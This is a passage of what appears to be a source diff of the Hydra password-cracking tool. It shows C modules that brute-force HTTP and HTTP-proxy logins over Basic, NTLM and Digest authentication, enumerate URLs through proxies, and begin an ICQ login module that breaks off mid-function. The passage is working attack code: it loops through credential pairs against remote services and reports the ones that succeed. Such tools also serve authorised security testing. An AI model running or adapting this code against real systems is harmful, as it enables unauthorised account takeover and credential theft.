buf = hydra_receive_line(s);
while (buf != NULL && strstr(buf, "HTTP/") == NULL) {
free(buf);
buf = hydra_receive_line(s);
}
if (debug)
hydra_report(stderr, "S:%s\n", buf);
//after the first query we should have been disconnected from web server
s = hydra_disconnect(s);
if ((options & OPTION_SSL) == 0) {
s = hydra_connect_tcp(ip, port);
} else {
s = hydra_connect_ssl(ip, port);
}
}
if (auth) {
if (hydra_strcasestr(buf, "Proxy-Authenticate: Basic") != NULL) {
http_proxy_auth_mechanism = AUTH_BASIC;
sprintf(buffer2, "%.50s:%.50s", login, pass);
hydra_tobase64((unsigned char *) buffer2, strlen(buffer2), sizeof(buffer2));
sprintf(buffer, "GET %s HTTP/1.0\r\n%sProxy-Authorization: Basic %s\r\nUser-Agent: Mozilla/4.0 (Hydra)\r\n%s\r\n", url, host, buffer2, header);
if (debug)
hydra_report(stderr, "C:%s\n", buffer);
if (hydra_send(s, buffer, strlen(buffer), 0) < 0)
return 1;
buf = hydra_receive_line(s);
while (buf != NULL && strstr(buf, "HTTP/1.") == NULL) {
free(buf);
buf = hydra_receive_line(s);
}
//if server cut the connection, just exit cleanly or
//this will be an infinite loop
if (buf == NULL) {
if (verbose)
hydra_report(stderr, "[ERROR] Server did not answer\n");
return 3;
}
if (debug)
hydra_report(stderr, "S:%s\n", buf);
} else {
if (hydra_strcasestr(buf, "Proxy-Authenticate: NTLM") != NULL) {
unsigned char buf1[4096];
unsigned char buf2[4096];
char *pos = NULL;
http_proxy_auth_mechanism = AUTH_NTLM;
//send auth and receive challenge
//send auth request: let the server send it's own hostname and domainname
buildAuthRequest((tSmbNtlmAuthRequest *) buf2, 0, NULL, NULL);
to64frombits(buf1, buf2, SmbLength((tSmbNtlmAuthRequest *) buf2));
/* to be portable, no snprintf, buffer is big enough so it cant overflow */
//send the first..
sprintf(buffer, "GET %s HTTP/1.0\r\n%sProxy-Authorization: NTLM %s\r\nUser-Agent: Mozilla/4.0 (Hydra)\r\nProxy-Connection: keep-alive\r\n%s\r\n", url, host, buf1,
header);
if (hydra_send(s, buffer, strlen(buffer), 0) < 0)
return 1;
//receive challenge
buf = hydra_receive_line(s);
while (buf != NULL && (pos = hydra_strcasestr(buf, "Proxy-Authenticate: NTLM ")) == NULL) {
free(buf);
buf = hydra_receive_line(s);
}
if (pos != NULL) {
char *str;
pos += 25;
if ((str = strchr(pos, '\r')) != NULL) {
pos[str - pos] = 0;
}
if ((str = strchr(pos, '\n')) != NULL) {
pos[str - pos] = 0;
}
}
//recover challenge
if (buf != NULL) {
from64tobits((char *) buf1, pos);
free(buf);
}
//Send response
buildAuthResponse((tSmbNtlmAuthChallenge *) buf1, (tSmbNtlmAuthResponse *) buf2, 0, login, pass, NULL, NULL);
to64frombits(buf1, buf2, SmbLength((tSmbNtlmAuthResponse *) buf2));
sprintf(buffer, "GET %s HTTP/1.0\r\n%sProxy-Authorization: NTLM %s\r\nUser-Agent: Mozilla/4.0 (Hydra)\r\nProxy-Connection: keep-alive\r\n%s\r\n", url, host, buf1,
header);
if (debug)
hydra_report(stderr, "C:%s\n", buffer);
if (hydra_send(s, buffer, strlen(buffer), 0) < 0)
return 1;
buf = hydra_receive_line(s);
while (buf != NULL && strstr(buf, "HTTP/1.") == NULL) {
free(buf);
buf = hydra_receive_line(s);
}
if (buf == NULL)
return 1;
} else {
#ifdef LIBOPENSSL
if (hydra_strcasestr(buf, "Proxy-Authenticate: Digest") != NULL) {
char *pbuffer;
http_proxy_auth_mechanism = AUTH_DIGESTMD5;
pbuffer = hydra_strcasestr(buf, "Proxy-Authenticate: Digest ");
strncpy(buffer, pbuffer + strlen("Proxy-Authenticate: Digest "), sizeof(buffer));
buffer[sizeof(buffer) - 1] = '\0';
sasl_digest_md5(buffer2, login, pass, buffer, miscptr, "proxy", host, 0, header);
if (buffer2 == NULL)
return 3;
if (debug)
hydra_report(stderr, "C:%s\n", buffer2);
if (hydra_send(s, buffer2, strlen(buffer2), 0) < 0)
return 1;
buf = hydra_receive_line(s);
while (buf != NULL && strstr(buf, "HTTP/1.") == NULL) {
free(buf);
buf = hydra_receive_line(s);
}
if (debug && buf != NULL)
hydra_report(stderr, "S:%s\n", buf);
if (buf == NULL)
return 1;
} else
#endif
{
if (buf != NULL) {
buf[strlen(buf) - 1] = '\0';
hydra_report(stderr, "Unsupported Auth type:\n%s\n", buf);
} else {
hydra_report(stderr, "Unsupported Auth type\n");
}
return 3;
}
}
}
}
// result analysis
ptr = ((char *) index(buf, ' ')) + 1;
if (*ptr == '2' || (*ptr == '3' && (*(ptr + 2) == '1' || *(ptr + 2) == '2')) || strncmp(ptr, "404", 4) == 0 || strncmp(ptr, "403", 4) == 0) {
hydra_report_found_host(port, ip, "http-proxy", fp);
if (fp != stdout)
fprintf(fp, "[%d][http-proxy-urlenum] host: %s url: %s\n", port, hydra_address2string(ip), url);
printf("[%d][http-proxy-urlenum] host: %s url: %s\n", port, hydra_address2string(ip), url);
hydra_completed_pair_found();
} else {
if (strncmp(ptr, "407", 3) == 0 /*|| strncmp(ptr, "401", 3) == 0 */ ) {
hydra_report(stderr, "[ERROR] Proxy reports bad credentials!\n");
return 3;
}
hydra_completed_pair();
}
free(buf);
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 3;
return 1;
}
void service_http_proxy_urlenum(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
int run = 1, next_run = 1, sock = -1;
int myport = PORT_HTTP_PROXY, mysslport = PORT_HTTP_PROXY_SSL;
hydra_register_socket(sp);
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return;
while (1) {
next_run = 0;
switch (run) {
case 1: /* connect and service init function */
{
if (sock >= 0)
sock = hydra_disconnect(sock);
// usleep(275000);
if ((options & OPTION_SSL) == 0) {
if (port != 0)
myport = port;
sock = hydra_connect_tcp(ip, myport);
port = myport;
} else {
if (port != 0)
mysslport = port;
sock = hydra_connect_ssl(ip, mysslport);
port = mysslport;
}
if (sock < 0) {
fprintf(stderr, "[ERROR] Child with pid %d terminating, can not connect\n", (int) getpid());
hydra_child_exit(1);
}
next_run = 2;
break;
}
case 2: /* run the cracking function */
next_run = start_http_proxy_urlenum(sock, ip, port, options, miscptr, fp);
break;
case 3: /* clean exit */
if (sock >= 0)
sock = hydra_disconnect(sock);
hydra_child_exit(0);
return;
default:
fprintf(stderr, "[ERROR] Caught unknown return code, exiting!\n");
hydra_child_exit(0);
}
run = next_run;
}
}
int service_http_proxy_urlenum_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
// called before the childrens are forked off, so this is the function
// which should be filled if initial connections and service setup has to be
// performed once only.
//
// fill if needed.
//
// return codes:
// 0 all OK
// -1 error, hydra will exit, so print a good error message here
return 0;
}

270
hydra-http-proxy.c Normal file
View file

@ -0,0 +1,270 @@
#include "hydra-mod.h"
#include "sasl.h"
extern char *HYDRA_EXIT;
char *buf;
static int http_proxy_auth_mechanism = AUTH_ERROR;
int start_http_proxy(int s, char *ip, int port, unsigned char options, char *miscptr, FILE * fp) {
char *empty = "";
char *login, *pass, buffer[500], buffer2[500];
char url[210], host[30];
char *header = ""; /* XXX TODO */
char *ptr;
if (strlen(login = hydra_get_next_login()) == 0)
login = empty;
if (strlen(pass = hydra_get_next_password()) == 0)
pass = empty;
if (miscptr == NULL) {
strcpy(url, "http://www.microsoft.com/");
strcpy(host, "Host: www.microsoft.com\r\n");
} else {
sprintf(url, "%.200s", miscptr);
ptr = strstr(miscptr, "://"); // :// check is in hydra.c
sprintf(host, "Host: %.200s", ptr + 3);
if ((ptr = index(host, '/')) != NULL)
*ptr = 0;
if ((ptr = index(host + 6, ':')) != NULL && host[0] != '[')
*ptr = 0;
strcat(host, "\r\n");
}
if (http_proxy_auth_mechanism == AUTH_ERROR) {
//send dummy request
sprintf(buffer, "GET %s HTTP/1.0\r\n%sUser-Agent: Mozilla/4.0 (Hydra)\r\n%s\r\n", url, host, header);
if (hydra_send(s, buffer, strlen(buffer), 0) < 0)
return 1;
//receive first 40x
buf = hydra_receive_line(s);
while (buf != NULL && strstr(buf, "HTTP/") == NULL) {
free(buf);
buf = hydra_receive_line(s);
}
if (debug)
hydra_report(stderr, "S:%s\n", buf);
//after the first query we should have been disconnected from web server
s = hydra_disconnect(s);
if ((options & OPTION_SSL) == 0) {
s = hydra_connect_tcp(ip, port);
} else {
s = hydra_connect_ssl(ip, port);
}
}
if (hydra_strcasestr(buf, "Proxy-Authenticate: Basic") != NULL) {
http_proxy_auth_mechanism = AUTH_BASIC;
sprintf(buffer2, "%.50s:%.50s", login, pass);
hydra_tobase64((unsigned char *) buffer2, strlen(buffer2), sizeof(buffer2));
sprintf(buffer, "GET %s HTTP/1.0\r\n%sProxy-Authorization: Basic %s\r\nUser-Agent: Mozilla/4.0 (Hydra)\r\n%s\r\n", url, host, buffer2, header);
if (debug)
hydra_report(stderr, "C:%s\n", buffer);
if (hydra_send(s, buffer, strlen(buffer), 0) < 0)
return 1;
buf = hydra_receive_line(s);
while (buf != NULL && strstr(buf, "HTTP/1.") == NULL) {
free(buf);
buf = hydra_receive_line(s);
}
//if server cut the connection, just exit cleanly or
//this will be an infinite loop
if (buf == NULL) {
if (verbose)
hydra_report(stderr, "[ERROR] Server did not answer\n");
return 3;
}
if (debug)
hydra_report(stderr, "S:%s\n", buf);
} else {
if (hydra_strcasestr(buf, "Proxy-Authenticate: NTLM") != NULL) {
unsigned char buf1[4096];
unsigned char buf2[4096];
char *pos = NULL;
http_proxy_auth_mechanism = AUTH_NTLM;
//send auth and receive challenge
//send auth request: let the server send it's own hostname and domainname
buildAuthRequest((tSmbNtlmAuthRequest *) buf2, 0, NULL, NULL);
to64frombits(buf1, buf2, SmbLength((tSmbNtlmAuthRequest *) buf2));
/* to be portable, no snprintf, buffer is big enough so it cant overflow */
//send the first..
sprintf(buffer, "GET %s HTTP/1.0\r\n%sProxy-Authorization: NTLM %s\r\nUser-Agent: Mozilla/4.0 (Hydra)\r\nProxy-Connection: keep-alive\r\n%s\r\n", url, host, buf1, header);
if (hydra_send(s, buffer, strlen(buffer), 0) < 0)
return 1;
//receive challenge
buf = hydra_receive_line(s);
while (buf != NULL && (pos = hydra_strcasestr(buf, "Proxy-Authenticate: NTLM ")) == NULL) {
free(buf);
buf = hydra_receive_line(s);
}
if (pos != NULL) {
char *str;
pos += 25;
if ((str = strchr(pos, '\r')) != NULL) {
pos[str - pos] = 0;
}
if ((str = strchr(pos, '\n')) != NULL) {
pos[str - pos] = 0;
}
}
//recover challenge
if (buf != NULL) {
from64tobits((char *) buf1, pos);
free(buf);
}
//Send response
buildAuthResponse((tSmbNtlmAuthChallenge *) buf1, (tSmbNtlmAuthResponse *) buf2, 0, login, pass, NULL, NULL);
to64frombits(buf1, buf2, SmbLength((tSmbNtlmAuthResponse *) buf2));
sprintf(buffer, "GET %s HTTP/1.0\r\n%sProxy-Authorization: NTLM %s\r\nUser-Agent: Mozilla/4.0 (Hydra)\r\nProxy-Connection: keep-alive\r\n%s\r\n", url, host, buf1, header);
if (debug)
hydra_report(stderr, "C:%s\n", buffer);
if (hydra_send(s, buffer, strlen(buffer), 0) < 0)
return 1;
buf = hydra_receive_line(s);
while (buf != NULL && strstr(buf, "HTTP/1.") == NULL) {
free(buf);
buf = hydra_receive_line(s);
}
if (buf == NULL)
return 1;
} else {
#ifdef LIBOPENSSL
if (hydra_strcasestr(buf, "Proxy-Authenticate: Digest") != NULL) {
char *pbuffer;
http_proxy_auth_mechanism = AUTH_DIGESTMD5;
pbuffer = hydra_strcasestr(buf, "Proxy-Authenticate: Digest ");
strncpy(buffer, pbuffer + strlen("Proxy-Authenticate: Digest "), sizeof(buffer));
buffer[sizeof(buffer) - 1] = '\0';
sasl_digest_md5(buffer2, login, pass, buffer, miscptr, "proxy", host, 0, header);
if (buffer2 == NULL)
return 3;
if (debug)
hydra_report(stderr, "C:%s\n", buffer2);
if (hydra_send(s, buffer2, strlen(buffer2), 0) < 0)
return 1;
buf = hydra_receive_line(s);
while (buf != NULL && strstr(buf, "HTTP/1.") == NULL) {
free(buf);
buf = hydra_receive_line(s);
}
if (debug && buf != NULL)
hydra_report(stderr, "S:%s\n", buf);
if (buf == NULL)
return 1;
} else
#endif
{
if (buf != NULL) {
buf[strlen(buf) - 1] = '\0';
hydra_report(stderr, "Unsupported Auth type:\n%s\n", buf);
} else {
hydra_report(stderr, "Unsupported Auth type\n");
}
return 3;
}
}
}
ptr = ((char *) index(buf, ' ')) + 1;
if (*ptr == '2' || (*ptr == '3' && *(ptr + 2) == '1') || (*ptr == '3' && *(ptr + 2) == '2')) {
hydra_report_found_host(port, ip, "http-proxy", fp);
hydra_completed_pair_found();
} else {
if (*ptr != '4')
hydra_report(stderr, "[INFO] Unusual return code: %c for %s:%s\n", (char) *(index(buf, ' ') + 1), login, pass);
else if (verbose && *(ptr + 2) == '3')
hydra_report(stderr, "[INFO] Potential success, could be false positive: %s:%s\n", login, pass);
hydra_completed_pair();
}
free(buf);
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 3;
return 1;
}
void service_http_proxy(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
int run = 1, next_run = 1, sock = -1;
int myport = PORT_HTTP_PROXY, mysslport = PORT_HTTP_PROXY_SSL;
hydra_register_socket(sp);
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return;
while (1) {
next_run = 0;
switch (run) {
case 1: /* connect and service init function */
{
if (sock >= 0)
sock = hydra_disconnect(sock);
// usleep(275000);
if ((options & OPTION_SSL) == 0) {
if (port != 0)
myport = port;
sock = hydra_connect_tcp(ip, myport);
port = myport;
} else {
if (port != 0)
mysslport = port;
sock = hydra_connect_ssl(ip, mysslport);
port = mysslport;
}
if (sock < 0) {
fprintf(stderr, "[ERROR] Child with pid %d terminating, can not connect\n", (int) getpid());
hydra_child_exit(1);
}
next_run = 2;
break;
}
case 2: /* run the cracking function */
next_run = start_http_proxy(sock, ip, port, options, miscptr, fp);
break;
case 3: /* clean exit */
if (sock >= 0)
sock = hydra_disconnect(sock);
hydra_child_exit(0);
return;
default:
fprintf(stderr, "[ERROR] Caught unknown return code, exiting!\n");
hydra_child_exit(0);
}
run = next_run;
}
}
int service_http_proxy_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
// called before the childrens are forked off, so this is the function
// which should be filled if initial connections and service setup has to be
// performed once only.
//
// fill if needed.
//
// return codes:
// 0 all OK
// -1 error, hydra will exit, so print a good error message here
return 0;
}

318
hydra-http.c Normal file
View file

@ -0,0 +1,318 @@
#include "hydra-mod.h"
#include "sasl.h"
extern char *HYDRA_EXIT;
char *buf = NULL;
char *webtarget = NULL;
char *slash = "/";
int webport, freemischttp = 0;
int http_auth_mechanism = AUTH_BASIC;
int start_http(int s, char *ip, int port, unsigned char options, char *miscptr, FILE * fp, char *type) {
char *empty = "";
char *login, *pass, buffer[500], buffer2[500];
char *header = ""; /* XXX TODO */
char *ptr;
if (strlen(login = hydra_get_next_login()) == 0)
login = empty;
if (strlen(pass = hydra_get_next_password()) == 0)
pass = empty;
// we must reset this if buf is NULL and we do MD5 digest
if (buf == NULL && http_auth_mechanism == AUTH_DIGESTMD5)
http_auth_mechanism = AUTH_BASIC;
switch (http_auth_mechanism) {
case AUTH_BASIC:
sprintf(buffer2, "%.50s:%.50s", login, pass);
hydra_tobase64((unsigned char *) buffer2, strlen(buffer2), sizeof(buffer2));
/* again: no snprintf to be portable. dont worry, buffer cant overflow */
if (use_proxy == 1 && proxy_authentication != NULL)
sprintf(buffer, "%s http://%s:%d%.250s HTTP/1.0\r\nHost: %s\r\nAuthorization: Basic %s\r\nProxy-Authorization: Basic %s\r\nUser-Agent: Mozilla/4.0 (Hydra)\r\n%s\r\n",
type, webtarget, webport, miscptr, webtarget, buffer2, proxy_authentication, header);
else {
if (use_proxy == 1)
sprintf(buffer, "%s http://%s:%d%.250s HTTP/1.0\r\nHost: %s\r\nAuthorization: Basic %s\r\nUser-Agent: Mozilla/4.0 (Hydra)\r\n%s\r\n",
type, webtarget, webport, miscptr, webtarget, buffer2, header);
else
sprintf(buffer, "%s %.250s HTTP/1.0\r\nHost: %s\r\nAuthorization: Basic %s\r\nUser-Agent: Mozilla/4.0 (Hydra)\r\n%s\r\n", type, miscptr, webtarget, buffer2, header);
}
if (debug)
hydra_report(stderr, "C:%s\n", buffer);
break;
#ifdef LIBOPENSSL
case AUTH_DIGESTMD5:{
char *pbuffer;
pbuffer = hydra_strcasestr(buf, "WWW-Authenticate: Digest ");
strncpy(buffer, pbuffer + strlen("WWW-Authenticate: Digest "), sizeof(buffer));
buffer[sizeof(buffer) - 1] = '\0';
sasl_digest_md5(buffer2, login, pass, buffer, miscptr, type, webtarget, webport, header);
if (buffer2 == NULL) {
return 3;
}
if (debug)
hydra_report(stderr, "C:%s\n", buffer2);
strcpy(buffer, buffer2);
}
break;
#endif
case AUTH_NTLM:{
unsigned char buf1[4096];
unsigned char buf2[4096];
char *pos = NULL;
//send auth and receive challenge
//send auth request: let the server send it's own hostname and domainname
buildAuthRequest((tSmbNtlmAuthRequest *) buf2, 0, NULL, NULL);
to64frombits(buf1, buf2, SmbLength((tSmbNtlmAuthRequest *) buf2));
/* to be portable, no snprintf, buffer is big enough so it cant overflow */
//send the first..
if (use_proxy == 1 && proxy_authentication != NULL)
sprintf(buffer,
"%s http://%s:%d%s HTTP/1.0\r\nHost: %s\r\nAuthorization: NTLM %s\r\nProxy-Authorization: Basic %s\r\nUser-Agent: Mozilla/4.0 (Hydra)\r\nConnection: keep-alive\r\n%s\r\n",
type, webtarget, webport, miscptr, webtarget, buf1, proxy_authentication, header);
else {
if (use_proxy == 1)
sprintf(buffer, "%s http://%s:%d%s HTTP/1.0\r\nHost: %s\r\nAuthorization: NTLM %s\r\nUser-Agent: Mozilla/4.0 (Hydra)\r\nConnection: keep-alive\r\n%s\r\n",
type, webtarget, webport, miscptr, webtarget, buf1, header);
else
sprintf(buffer, "%s %s HTTP/1.0\r\nHost: %s\r\nAuthorization: NTLM %s\r\nUser-Agent: Mozilla/4.0 (Hydra)\r\nConnection: keep-alive\r\n%s\r\n", type, miscptr, webtarget,
buf1, header);
}
if (hydra_send(s, buffer, strlen(buffer), 0) < 0)
return 1;
//receive challenge
if (buf != NULL)
free(buf);
buf = hydra_receive_line(s);
while (buf != NULL && (pos = hydra_strcasestr(buf, "WWW-Authenticate: NTLM ")) == NULL) {
free(buf);
buf = hydra_receive_line(s);
}
if (buf == NULL)
return 1;
if (pos != NULL) {
char *str;
pos += 23;
if ((str = strchr(pos, '\r')) != NULL) {
pos[str - pos] = 0;
}
if ((str = strchr(pos, '\n')) != NULL) {
pos[str - pos] = 0;
}
}
//recover challenge
from64tobits((char *) buf1, pos);
free(buf);
buf = NULL;
//Send response
buildAuthResponse((tSmbNtlmAuthChallenge *) buf1, (tSmbNtlmAuthResponse *) buf2, 0, login, pass, NULL, NULL);
to64frombits(buf1, buf2, SmbLength((tSmbNtlmAuthResponse *) buf2));
//create the auth response
if (use_proxy == 1 && proxy_authentication != NULL)
sprintf(buffer,
"%s http://%s:%d%s HTTP/1.0\r\nHost: %s\r\nAuthorization: NTLM %s\r\nProxy-Authorization: Basic %s\r\nUser-Agent: Mozilla/4.0 (Hydra)\r\nConnection: keep-alive\r\n%s\r\n",
type, webtarget, webport, miscptr, webtarget, buf1, proxy_authentication, header);
else {
if (use_proxy == 1)
sprintf(buffer, "%s http://%s:%d%s HTTP/1.0\r\nHost: %s\r\nAuthorization: NTLM %s\r\nUser-Agent: Mozilla/4.0 (Hydra)\r\nConnection: keep-alive\r\n%s\r\n",
type, webtarget, webport, miscptr, webtarget, buf1, header);
else
sprintf(buffer, "%s %s HTTP/1.0\r\nHost: %s\r\nAuthorization: NTLM %s\r\nUser-Agent: Mozilla/4.0 (Hydra)\r\nConnection: keep-alive\r\n%s\r\n", type, miscptr, webtarget,
buf1, header);
}
if (debug)
hydra_report(stderr, "C:%s\n", buffer);
}
break;
}
if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {
return 1;
}
if (buf != NULL)
free(buf);
buf = hydra_receive_line(s);
while (buf != NULL && strstr(buf, "HTTP/1.") == NULL) {
free(buf);
buf = hydra_receive_line(s);
}
//if server cut the connection, just exit cleanly or
//this will be an infinite loop
if (buf == NULL) {
if (verbose)
hydra_report(stderr, "[ERROR] Server did not answer\n");
return 3;
}
if (debug)
hydra_report(stderr, "S:%s\n", buf);
ptr = ((char *) index(buf, ' ')) + 1;
if (ptr != NULL && (*ptr == '2' || *ptr == '3' || strncmp(ptr, "403", 3) == 0 || strncmp(ptr, "404", 3) == 0)) {
hydra_report_found_host(port, ip, "www", fp);
hydra_completed_pair_found();
if (buf != NULL) {
free(buf);
buf = NULL;
}
} else {
if (ptr != NULL && *ptr != '4')
fprintf(stderr, "[WARNING] Unusual return code: %c for %s:%s\n", (char) *(index(buf, ' ') + 1), login, pass);
//the first authentication type failed, check the type from server header
if ((hydra_strcasestr(buf, "WWW-Authenticate: Basic") == NULL) && (http_auth_mechanism == AUTH_BASIC)) {
//seems the auth supported is not Basic shceme so testing further
int find_auth = 0;
if (hydra_strcasestr(buf, "WWW-Authenticate: NTLM") != NULL) {
http_auth_mechanism = AUTH_NTLM;
find_auth = 1;
}
#ifdef LIBOPENSSL
if (hydra_strcasestr(buf, "WWW-Authenticate: Digest") != NULL) {
http_auth_mechanism = AUTH_DIGESTMD5;
find_auth = 1;
}
#endif
if (find_auth) {
// free(buf);
// buf = NULL;
return 1;
}
}
hydra_completed_pair();
}
// free(buf);
// buf = NULL;
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 3;
return 1;
}
void service_http(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port, char *type) {
int run = 1, next_run = 1, sock = -1;
int myport = PORT_HTTP, mysslport = PORT_HTTP_SSL;
char *ptr, *ptr2;
hydra_register_socket(sp);
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return;
if ((webtarget = strstr(miscptr, "://")) != NULL) {
webtarget += strlen("://");
if ((ptr2 = index(webtarget, ':')) != NULL) { /* step over port if present */
*ptr2 = 0;
ptr2++;
ptr = ptr2;
if (*ptr == '/' || (ptr = index(ptr2, '/')) != NULL)
miscptr = ptr;
else
miscptr = slash; /* to make things easier to user */
} else if ((ptr2 = index(webtarget, '/')) != NULL) {
miscptr = malloc(strlen(ptr2) + 1);
freemischttp = 1;
strcpy(miscptr, ptr2);
*ptr2 = 0;
} else
webtarget = NULL;
}
if (cmdlinetarget != NULL && webtarget == NULL)
webtarget = cmdlinetarget;
else if (webtarget == NULL && cmdlinetarget == NULL)
webtarget = hydra_address2string(ip);
if (port != 0)
webport = port;
else if ((options & OPTION_SSL) == 0)
webport = myport;
else
webport = mysslport;
while (1) {
next_run = 0;
switch (run) {
case 1: /* connect and service init function */
{
if (sock >= 0)
sock = hydra_disconnect(sock);
if ((options & OPTION_SSL) == 0) {
if (port != 0)
myport = port;
sock = hydra_connect_tcp(ip, myport);
port = myport;
} else {
if (port != 0)
mysslport = port;
sock = hydra_connect_ssl(ip, mysslport);
port = mysslport;
}
if (sock < 0) {
if (freemischttp)
free(miscptr);
fprintf(stderr, "[ERROR] Child with pid %d terminating, can not connect\n", (int) getpid());
hydra_child_exit(1);
}
next_run = 2;
break;
}
case 2: /* run the cracking function */
next_run = start_http(sock, ip, port, options, miscptr, fp, type);
break;
case 3: /* clean exit */
if (sock >= 0)
sock = hydra_disconnect(sock);
if (freemischttp)
free(miscptr);
hydra_child_exit(0);
return;
default:
if (freemischttp)
free(miscptr);
fprintf(stderr, "[ERROR] Caught unknown return code, exiting!\n");
hydra_child_exit(0);
}
run = next_run;
}
}
void service_http_get(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
service_http(ip, sp, options, miscptr, fp, port, "GET");
}
void service_http_head(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
service_http(ip, sp, options, miscptr, fp, port, "HEAD");
}
int service_http_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
// called before the childrens are forked off, so this is the function
// which should be filled if initial connections and service setup has to be
// performed once only.
//
// fill if needed.
//
// return codes:
// 0 all OK
// -1 error, hydra will exit, so print a good error message here
return 0;
}

256
hydra-icq.c Normal file
View file

@ -0,0 +1,256 @@
#include "hydra-mod.h"
extern char *HYDRA_EXIT;
extern int child_head_no;
int seq = 1;
const unsigned char icq5_table[] = {
0x59, 0x60, 0x37, 0x6B, 0x65, 0x62, 0x46, 0x48, 0x53, 0x61, 0x4C,
0x59, 0x60, 0x57, 0x5B, 0x3D, 0x5E, 0x34, 0x6D, 0x36, 0x50, 0x3F,
0x6F, 0x67, 0x53, 0x61, 0x4C, 0x59, 0x40, 0x47, 0x63, 0x39, 0x50,
0x5F, 0x5F, 0x3F, 0x6F, 0x47, 0x43, 0x69, 0x48, 0x33, 0x31, 0x64,
0x35, 0x5A, 0x4A, 0x42, 0x56, 0x40, 0x67, 0x53, 0x41, 0x07, 0x6C,
0x49, 0x58, 0x3B, 0x4D, 0x46, 0x68, 0x43, 0x69, 0x48, 0x33, 0x31,
0x44, 0x65, 0x62, 0x46, 0x48, 0x53, 0x41, 0x07, 0x6C, 0x69, 0x48,
0x33, 0x51, 0x54, 0x5D, 0x4E, 0x6C, 0x49, 0x38, 0x4B, 0x55, 0x4A,
0x62, 0x46, 0x48, 0x33, 0x51, 0x34, 0x6D, 0x36, 0x50, 0x5F, 0x5F,
0x5F, 0x3F, 0x6F, 0x47, 0x63, 0x59, 0x40, 0x67, 0x33, 0x31, 0x64,
0x35, 0x5A, 0x6A, 0x52, 0x6E, 0x3C, 0x51, 0x34, 0x6D, 0x36, 0x50,
0x5F, 0x5F, 0x3F, 0x4F, 0x37, 0x4B, 0x35, 0x5A, 0x4A, 0x62, 0x66,
0x58, 0x3B, 0x4D, 0x66, 0x58, 0x5B, 0x5D, 0x4E, 0x6C, 0x49, 0x58,
0x3B, 0x4D, 0x66, 0x58, 0x3B, 0x4D, 0x46, 0x48, 0x53, 0x61, 0x4C,
0x59, 0x40, 0x67, 0x33, 0x31, 0x64, 0x55, 0x6A, 0x32, 0x3E, 0x44,
0x45, 0x52, 0x6E, 0x3C, 0x31, 0x64, 0x55, 0x6A, 0x52, 0x4E, 0x6C,
0x69, 0x48, 0x53, 0x61, 0x4C, 0x39, 0x30, 0x6F, 0x47, 0x63, 0x59,
0x60, 0x57, 0x5B, 0x3D, 0x3E, 0x64, 0x35, 0x3A, 0x3A, 0x5A, 0x6A,
0x52, 0x4E, 0x6C, 0x69, 0x48, 0x53, 0x61, 0x6C, 0x49, 0x58, 0x3B,
0x4D, 0x46, 0x68, 0x63, 0x39, 0x50, 0x5F, 0x5F, 0x3F, 0x6F, 0x67,
0x53, 0x41, 0x25, 0x41, 0x3C, 0x51, 0x54, 0x3D, 0x5E, 0x54, 0x5D,
0x4E, 0x4C, 0x39, 0x50, 0x5F, 0x5F, 0x5F, 0x3F, 0x6F, 0x47, 0x43,
0x69, 0x48, 0x33, 0x51, 0x54, 0x5D, 0x6E, 0x3C, 0x31, 0x64, 0x35,
0x5A, 0x00, 0x00
};
void fix_packet(char *buf, int len) {
unsigned long c1, c2;
unsigned long r1, r2;
int pos, key, k;
c1 = buf[8];
c1 <<= 8;
c1 |= buf[4];
c1 <<= 8;
c1 |= buf[2];
c1 <<= 8;
c1 |= buf[6];
r1 = (rand() % (len - 0x18)) + 0x18;
r2 = rand() & 0xff;
c2 = r1;
c2 <<= 8;
c2 |= buf[r1];
c2 <<= 8;
c2 |= r2;
c2 <<= 8;
c2 |= icq5_table[r2];
c2 ^= 0xff00ff;
c1 ^= c2;
buf[0x14] = c1 & 0xff;
buf[0x15] = (c1 >> 8) & 0xff;
buf[0x16] = (c1 >> 16) & 0xff;
buf[0x17] = (c1 >> 24) & 0xff;
key = len * 0x68656c6cL;
key += c1;
pos = 0xa;
for (; pos < len; pos += 4)
k = key + icq5_table[pos & 0xff];
}
void icq_header(char *buf, unsigned short cmd, unsigned long uin) {
buf[0] = 0x02;
buf[1] = 0x00;
buf[2] = cmd & 0xff;
buf[3] = (cmd >> 8) & 0xff;
buf[4] = seq & 0xff;
buf[5] = (seq++ >> 8) & 0xff;
buf[6] = uin & 0xff;
buf[7] = (uin >> 8) & 0xff;
buf[8] = (uin >> 16) & 0xff;
buf[9] = (uin >> 24) & 0xff;
}
int icq_login(int s, char *login, char *pass) {
unsigned long uin = strtoul(login, NULL, 10);
char buf[256];
int len;
bzero(buf, sizeof(buf));
icq_header(buf, 0x03e8, uin);
len = strlen(pass) + 1;
buf[14] = len;
memcpy(&buf[16], pass, len);
buf[16 + len] = 0x78;
buf[24 + len] = 0x04;
buf[29 + len] = 0x02;
buf[39 + len] = 0x08;
buf[41 + len] = 0x78;
return (hydra_send(s, buf, 43 + len, 0));
}
int icq_login_1(int s, char *login) {
unsigned long uin = strtoul(login, NULL, 10);
char buf[64];
icq_header(buf, 0x044c, uin);
return (hydra_send(s, buf, 10, 0));
}
int icq_disconnect(int s, char *login) {
unsigned long uin = strtoul(login, NULL, 10);
char buf[64];
bzero(buf, sizeof(buf));
icq_header(buf, 0x0438, uin);
buf[10] = 20;
memcpy(&buf[12], "B_USER_DISCONNECTED", 20);
buf[32] = 0x5;
return (hydra_send(s, buf, 34, 0));
}
int icq_ack(int s, char *login) {
